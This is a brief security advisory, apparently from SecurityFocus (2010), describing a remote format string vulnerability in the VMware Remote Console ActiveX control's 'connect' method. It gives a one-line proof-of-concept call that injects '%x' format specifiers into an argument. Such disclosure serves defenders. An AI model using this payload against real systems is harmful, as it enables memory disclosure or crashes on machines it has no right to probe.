VMware Remote Console 'connect' Method Remote Format String Vulnerability

The following proof-of-concept call for the ActiveX control is available:

objectVMRC.connect ("host" ,"username" ,"password", "%x:%x:%x:%x:%x:%x:%x:%x:%x" ,"X" ,2);


 

Privacy Statement
Copyright 2010, SecurityFocus